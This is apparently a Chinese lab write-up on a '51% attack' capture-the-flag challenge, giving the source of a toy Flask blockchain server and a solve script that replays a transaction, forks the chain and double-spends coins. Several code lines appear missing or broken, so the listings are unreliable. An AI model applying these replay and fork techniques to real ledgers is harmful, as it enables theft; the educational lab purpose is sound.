
news2025/2/25 14:26:03



  • 区块链安全
  • 51%攻击实战
    • 实验目的
    • 实验环境
    • 实验工具
    • 实验原理
    • 攻击过程







  1. python2


3虽然这种攻击发生的可能性不是很大掌握这种算力的人本身就可以通过挖矿获得大受益,再去冒险算改账本很容易暴露自身)。仍然是理论上看: 一旦这种攻击被发现,比特币网络其他终端可以联合起来对已知的区块链进行硬分叉,全体否认非法的交易。
3.实验地址为 http://ip:10000/b942f830cf97e ,详细见附件





# -*- encoding: utf-8 -*-
# written in python 2.7

import hashlib, json, rsa, uuid, os
from flask import Flask, session, redirect, url_for, escape, request

app = Flask(__name__)
app.secret_key = '*********************'
url_prefix = '/b942f830cf97e'

def FLAG():
    return 'Here is your flag: flag{******************}'

def hash(x):
    return hashlib.sha256(hashlib.md5(x).digest()).hexdigest()

def hash_reducer(x, y):
    return hash(hash(x)+hash(y))

def has_attrs(d, attrs):
    if type(d) != type({}): raise Exception("Input should be a dict/JSON")
    for attr in attrs:
        if attr not in d:
            raise Exception("{} should be presented in the input".format(attr))

EMPTY_HASH = '0'*64

def addr_to_pubkey(address):
    return rsa.PublicKey(int(address, 16), 65537)

def pubkey_to_address(pubkey):
    assert pubkey.e == 65537
    hexed = hex(pubkey.n)
    if hexed.endswith('L'): hexed = hexed[:-1]
    if hexed.startswith('0x'): hexed = hexed[2:]
    return hexed

def gen_addr_key_pair():
    pubkey, privkey = rsa.newkeys(384)
    return pubkey_to_address(pubkey), privkey

bank_address, bank_privkey = gen_addr_key_pair()
hacker_address, hacker_privkey = gen_addr_key_pair()
shop_address, shop_privkey = gen_addr_key_pair()
shop_wallet_address, shop_wallet_privkey = gen_addr_key_pair()

def sign_input_utxo(input_utxo_id, privkey):
    return rsa.sign(input_utxo_id, privkey, 'SHA-1').encode('hex')

def hash_utxo(utxo):
    return reduce(hash_reducer, [utxo['id'], utxo['addr'], str(utxo['amount'])])

def create_output_utxo(addr_to, amount):
    utxo = {'id': str(uuid.uuid4()), 'addr': addr_to, 'amount': amount}
    utxo['hash'] = hash_utxo(utxo)
    return utxo

def hash_tx(tx):
    return reduce(hash_reducer, [
        reduce(hash_reducer, tx['input'], EMPTY_HASH),
        reduce(hash_reducer, [utxo['hash'] for utxo in tx['output']], EMPTY_HASH)

def create_tx(input_utxo_ids, output_utxo, privkey_from=None):
    tx = {'input': input_utxo_ids, 'signature': [sign_input_utxo(id, privkey_from) for id in input_utxo_ids], 'output': output_utxo}
    tx['hash'] = hash_tx(tx)
    return tx

def hash_block(block):
    return reduce(hash_reducer, [block['prev'], block['nonce'], reduce(hash_reducer, [tx['hash'] for tx in block['transactions']], EMPTY_HASH)])

def create_block(prev_block_hash, nonce_str, transactions):
    if type(prev_block_hash) != type(''): raise Exception('prev_block_hash should be hex-encoded hash value')
    nonce = str(nonce_str)
    if len(nonce) > 128: raise Exception('the nonce is too long')
    block = {'prev': prev_block_hash, 'nonce': nonce, 'transactions': transactions}
    block['hash'] = hash_block(block)
    return block

def find_blockchain_tail():
    return max(session['blocks'].values(), key=lambda block: block['height'])

def calculate_utxo(blockchain_tail):
    curr_block = blockchain_tail
    blockchain = [curr_block]
    while curr_block['hash'] != session['genesis_block_hash']:
        curr_block = session['blocks'][curr_block['prev']]
    blockchain = blockchain[::-1]
    utxos = {}
    for block in blockchain:
        for tx in block['transactions']:
            for input_utxo_id in tx['input']:
                del utxos[input_utxo_id]
            for utxo in tx['output']:
                utxos[utxo['id']] = utxo
    return utxos

def calculate_balance(utxos):
    balance = {bank_address: 0, hacker_address: 0, shop_address: 0}
    for utxo in utxos.values():
        if utxo['addr'] not in balance:
            balance[utxo['addr']] = 0
        balance[utxo['addr']] += utxo['amount']
    return balance

def verify_utxo_signature(address, utxo_id, signature):
        return rsa.verify(utxo_id, signature.decode('hex'), addr_to_pubkey(address))
        return False

def append_block(block, difficulty=int('f'*64, 16)):
    has_attrs(block, ['prev', 'nonce', 'transactions'])

    if type(block['prev']) == type(u''): block['prev'] = str(block['prev'])
    if type(block['nonce']) == type(u''): block['nonce'] = str(block['nonce'])
    if block['prev'] not in session['blocks']: raise Exception("unknown parent block")
    tail = session['blocks'][block['prev']]
    utxos = calculate_utxo(tail)

    if type(block['transactions']) != type([]): raise Exception('Please put a transaction array in the block')
    new_utxo_ids = set()
    for tx in block['transactions']:
        has_attrs(tx, ['input', 'output', 'signature'])

        for utxo in tx['output']:
            has_attrs(utxo, ['amount', 'addr', 'id'])
            if type(utxo['id']) == type(u''): utxo['id'] = str(utxo['id'])
            if type(utxo['addr']) == type(u''): utxo['addr'] = str(utxo['addr'])
            if type(utxo['id']) != type(''): raise Exception("unknown type of id of output utxo")
            if utxo['id'] in new_utxo_ids: raise Exception("output utxo of same id({}) already exists.".format(utxo['id']))
            if type(utxo['amount']) != type(1): raise Exception("unknown type of amount of output utxo")
            if utxo['amount'] <= 0: raise Exception("invalid amount of output utxo")
            if type(utxo['addr']) != type(''): raise Exception("unknown type of address of output utxo")
                raise Exception("invalid type of address({})".format(utxo['addr']))
            utxo['hash'] = hash_utxo(utxo)
        tot_output = sum([utxo['amount'] for utxo in tx['output']])

        if type(tx['input']) != type([]): raise Exception("type of input utxo ids in tx should be array")
        if type(tx['signature']) != type([]): raise Exception("type of input utxo signatures in tx should be array")
        if len(tx['input']) != len(tx['signature']): raise Exception("lengths of arrays of ids and signatures of input utxos should be the same")
        tot_input = 0
        tx['input'] = [str(i) if type(i) == type(u'') else i for i in tx['input']]
        tx['signature'] = [str(i) if type(i) == type(u'') else i for i in tx['signature']]
        for utxo_id, signature in zip(tx['input'], tx['signature']):
            if type(utxo_id) != type(''): raise Exception("unknown type of id of input utxo")
            if utxo_id not in utxos: raise Exception("invalid id of input utxo. Input utxo({}) does not exist or it has been consumed.".format(utxo_id))
            utxo = utxos[utxo_id]
            if type(signature) != type(''): raise Exception("unknown type of signature of input utxo")
            if not verify_utxo_signature(utxo['addr'], utxo_id, signature):
                raise Exception("Signature of input utxo is not valid. You are not the owner of this input utxo({})!".format(utxo_id))
            tot_input += utxo['amount']
            del utxos[utxo_id]
        if tot_output > tot_input:
            raise Exception("You don't have enough amount of DDCoins in the input utxo! {}/{}".format(tot_input, tot_output))
        tx['hash'] = hash_tx(tx)

    block = create_block(block['prev'], block['nonce'], block['transactions'])
    block_hash = int(block['hash'], 16)
    if block_hash > difficulty: raise Exception('Please provide a valid Proof-of-Work')
    block['height'] = tail['height']+1
    if len(session['blocks']) > 50: raise Exception('The blockchain is too long. Use ./reset to reset the blockchain')
    if block['hash'] in session['blocks']: raise Exception('A same block is already in the blockchain')
    session['blocks'][block['hash']] = block
    session.modified = True

def init():
    if 'blocks' not in session:
        session['blocks'] = {}
        session['your_diamonds'] = 0

        # First, the bank issued some DDCoins ...
        total_currency_issued = create_output_utxo(bank_address, 1000000)
        genesis_transaction = create_tx([], [total_currency_issued]) # create DDCoins from nothing
        genesis_block = create_block(EMPTY_HASH, 'The Times 03/Jan/2009 Chancellor on brink of second bailout for bank', [genesis_transaction])
        session['genesis_block_hash'] = genesis_block['hash']
        genesis_block['height'] = 0
        session['blocks'][genesis_block['hash']] = genesis_block

        # Then, the bank was hacked by the hacker ...
        handout = create_output_utxo(hacker_address, 999999)
        reserved = create_output_utxo(bank_address, 1)
        transferred = create_tx([total_currency_issued['id']], [handout, reserved], bank_privkey)
        second_block = create_block(genesis_block['hash'], 'HAHA, I AM THE BANK NOW!', [transferred])

        # Can you buy 2 diamonds using all DDCoins?
        third_block = create_block(second_block['hash'], 'a empty block', [])

def get_balance_of_all():
    tail = find_blockchain_tail()
    utxos = calculate_utxo(tail)
    return calculate_balance(utxos), utxos, tail

def homepage():
    announcement = 'Announcement: The server has been restarted at 21:45 04/17. All blockchain have been reset. '
    balance, utxos, _ = get_balance_of_all()
    genesis_block_info = 'hash of genesis block: ' + session['genesis_block_hash']
    addr_info = 'the bank\'s addr: ' + bank_address + ', the hacker\'s addr: ' + hacker_address + ', the shop\'s addr: ' + shop_address
    balance_info = 'Balance of all addresses: ' + json.dumps(balance)
    utxo_info = 'All utxos: ' + json.dumps(utxos)
    blockchain_info = 'Blockchain Explorer: ' + json.dumps(session['blocks'])
    view_source_code_link = "<a href='source_code'>View source code</a>"
    return announcement+('<br /><br />\r\n\r\n'.join([view_source_code_link, genesis_block_info, addr_info, balance_info, utxo_info, blockchain_info]))

def getFlag():
    if session['your_diamonds'] >= 2: return FLAG()
    return 'To get the flag, you should buy 2 diamonds from the shop. You have {} diamonds now. To buy a diamond, transfer 1000000 DDCoins to '.format(session['your_diamonds']) + shop_address

def find_enough_utxos(utxos, addr_from, amount):
    collected = []
    for utxo in utxos.values():
        if utxo['addr'] == addr_from:
            amount -= utxo['amount']
        if amount <= 0: return collected, -amount
    raise Exception('no enough DDCoins in ' + addr_from)

def transfer(utxos, addr_from, addr_to, amount, privkey):
    input_utxo_ids, the_change = find_enough_utxos(utxos, addr_from, amount)
    outputs = [create_output_utxo(addr_to, amount)]
    if the_change != 0:
        outputs.append(create_output_utxo(addr_from, the_change))
    return create_tx(input_utxo_ids, outputs, privkey)

def free_ddcoin(address):
    balance, utxos, tail = get_balance_of_all()
    if balance[bank_address] == 0: return 'The bank has no money now.'
        address = str(address)
        addr_to_pubkey(address) # to check if it is a valid address
        transferred = transfer(utxos, bank_address, address, balance[bank_address], bank_privkey)
        new_block = create_block(tail['hash'], 'b@cKd00R tr1993ReD', [transferred])
        return str(balance[bank_address]) + ' DDCoins are successfully sent to ' + address
    except Exception, e:
        return 'ERROR: ' + str(e)

DIFFICULTY = int('00000' + 'f' * 59, 16)
@app.route(url_prefix+'/create_transaction', methods=['POST'])
def create_tx_and_check_shop_balance():
        block = json.loads(request.data)
        append_block(block, DIFFICULTY)
        msg = 'transaction finished.'
    except Exception, e:
        return str(e)

    balance, utxos, tail = get_balance_of_all()
    if balance[shop_address] == 1000000:
        # when 1000000 DDCoins are received, the shop will give you a diamond
        session['your_diamonds'] += 1
        # and immediately the shop will store the money somewhere safe.
        transferred = transfer(utxos, shop_address, shop_wallet_address, balance[shop_address], shop_privkey)
        new_block = create_block(tail['hash'], 'save the DDCoins in a cold wallet', [transferred])
        msg += ' You receive a diamond.'
    return msg

# if you mess up the blockchain, use this to reset the blockchain.
def reset_blockchain():
    if 'blocks' in session: del session['blocks']
    if 'genesis_block_hash' in session: del session['genesis_block_hash']
    return 'reset.'

def show_source_code():
    source = open('serve.py', 'r')
    html = ''
    for line in source:
        html += line.replace('&','&amp;').replace('\t', '&nbsp;'*4).replace(' ','&nbsp;').replace('<', '&lt;').replace('>','&gt;').replace('\n', '<br />')
    return html

if __name__ == '__main__':
    app.run(debug=False, host='')








import requests, json, hashlib, rsa

EMPTY_HASH = '0'*64

def pubkey_to_address(pubkey):
    assert pubkey.e == 65537
    hexed = hex(pubkey.n)
    if hexed.endswith('L'): hexed = hexed[:-1]
    if hexed.startswith('0x'): hexed = hexed[2:]
    return hexed

def gen_addr_key_pair():
    pubkey, privkey = rsa.newkeys(384)
    return pubkey_to_address(pubkey), privkey

def sign_input_utxo(input_utxo_id, privkey):
    return rsa.sign(input_utxo_id, privkey, 'SHA-1').encode('hex')

def hash(x):
    return hashlib.sha256(hashlib.md5(x).digest()).hexdigest()

def hash_reducer(x, y):
    return hash(hash(x)+hash(y))

def hash_utxo(utxo):
    return reduce(hash_reducer, [utxo['id'], utxo['addr'], str(utxo['amount'])])

def hash_tx(tx):
    return reduce(hash_reducer, [
        reduce(hash_reducer, tx['input'], EMPTY_HASH),
        reduce(hash_reducer, [utxo['hash'] for utxo in tx['output']], EMPTY_HASH)

def hash_block(block):
    return reduce(hash_reducer, [block['prev'], block['nonce'], reduce(hash_reducer, [tx['hash'] for tx in block['transactions']], EMPTY_HASH)])

def create_tx(input_utxo_ids, output_utxo, privkey_from=None):
    tx = {'input': input_utxo_ids, 'signature': [sign_input_utxo(id, privkey_from) for id in input_utxo_ids], 'output': output_utxo}
    tx['hash'] = hash_tx(tx)
    return tx

# -------------- code copied from server.py END ------------

def create_output_utxo(addr_to, amount):
    utxo = {'id': 'my_recycled_utxo', 'addr': addr_to, 'amount': amount}
    utxo['hash'] = hash_utxo(utxo)
    return utxo

def create_block_with_PoW(prev_block_hash, transactions, difficulty, nonce_prefix='nonce-'):
    nonce_str = 0
    while True:
        nonce_str += 1
        nonce = nonce_prefix + str(nonce_str)
        block = {'prev': prev_block_hash, 'nonce': nonce, 'transactions': transactions}
        block['hash'] = hash_block(block)
        if int(block['hash'], 16) &lt; difficulty: return block

url_prefix = ''
s = requests.session()
my_address, my_privkey = gen_addr_key_pair()
print 'my address:', my_address

def append_block(block):
    print '[APPEND]', s.post(url_prefix+'/create_transaction', data=json.dumps(block)).text

def show_blockchain():
    print s.get(url_prefix+'/').text.replace('&lt;br /&gt;','')

blocks = json.loads(s.get(url_prefix+'/').text.split('Blockchain Explorer: ')[1]).values()
genesis_block = filter(lambda i: i['height'] == 0, blocks)[0]

# replay attack
attacked_block = filter(lambda i: i['height'] == 1, blocks)[0]
replayed_tx = attacked_block['transactions'][0]
replayed_tx['output'] = [create_output_utxo(my_address, 1000000)]
replayed_tx['hash'] = hash_tx(replayed_tx)

DIFFICULTY = int('00000' + 'f' * 59, 16)
forked_block = create_block_with_PoW(genesis_block['hash'], [replayed_tx], DIFFICULTY)

# generate 2 empty blocks behind to make sure our forked chain is the longest blockchain
prev = forked_block['hash']
for i in xrange(2):
    empty_block = create_block_with_PoW(prev, [], DIFFICULTY)
    prev = empty_block['hash']

print 'replay done. ------------------ '

# now we have 1000000 DDCoins, transfer to the shop to buy diamond
shop_address = s.get(url_prefix+'/flag').text.split('1000000 DDCoins to ')[1]
output_to_shop = create_output_utxo(shop_address, 1000000)
utxo_to_double_spend = replayed_tx['output'][0]['id']
tx_to_shop = create_tx([utxo_to_double_spend], [output_to_shop], my_privkey)
new_block = create_block_with_PoW(prev, [tx_to_shop], DIFFICULTY)

# now we have 1 diamond and 0 DDCoin, we should double spend the "utxo_to_double_spend" by forking the blockchain again
new_block = create_block_with_PoW(prev, [tx_to_shop], DIFFICULTY, 'another-chain-nonce-')
# append another 2 empty blocks to make sure this is the longest blockchain
prev = new_block['hash']
for i in xrange(2):
    empty_block = create_block_with_PoW(prev, [], DIFFICULTY)
    prev = empty_block['hash']
# and the shop receive 1000000 DDCoins in this newly-forked blockchain... we have got another diamond

print '===================='
print s.get(url_prefix+'/flag').text





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Windows 安装 汉化版 burp suite

注&#xff1a;个人笔记&#xff0c;仅供参考。 burpsuite 软件下载链接&#xff1a; https://www.alipan.com/s/cWxMF5S9sq4 提取码: 31ut 注&#xff1a;安装路径不要有中文 安装 配置 Java 环境 因为burpsuite是在JAVA环境下运行的&#xff0c;所以首先应该配置好JAVA环…

浙大恩特客户资源管理系统 SQL注入漏洞复现

0x01 产品简介 浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源&#xff0c;提升销售和市场营销的效果。 0x02 漏洞概述 浙大恩特客户资源管理系统中T0140_editAction.entweb接口处存在SQL注入漏洞&#xff0c;未…

解决Error:java: System Java Compiler was not found in classpath

解决Error:java: System Java Compiler was not found in classpath 一、配置maven 注意:我的C盘比较大直接配置在了C盘&#xff0c;建议配置到其他盘&#xff0c;记得做maven环境变量配置 二、卸载本地JDK&#xff0c;换个版本安装配置环境变量 重启电脑或idea&#xff0c;…


文章 前言错误场景问题分析解决方案后言 前言 ✨✨ 他们是天生勇敢的开发者&#xff0c;我们创造bug&#xff0c;传播bug&#xff0c;毫不留情地消灭bug&#xff0c;在这个过程中我们创造了很多bug以供娱乐。 前端bug这里是博主总结的一些前端的bug以及解决方案&#xff0c;感兴…

Linux环境下C++ 接入OpenSSL

接上一篇&#xff1a;Windows环境下C 安装OpenSSL库 源码编译及使用&#xff08;VS2019&#xff09;_vs2019安装openssl_肥宝Fable的博客-CSDN博客 解决完本地windows环境&#xff0c;想赶紧在外网环境看看是否也正常。毕竟现在只是HelloWorld级别的&#xff0c;等东西多了&am…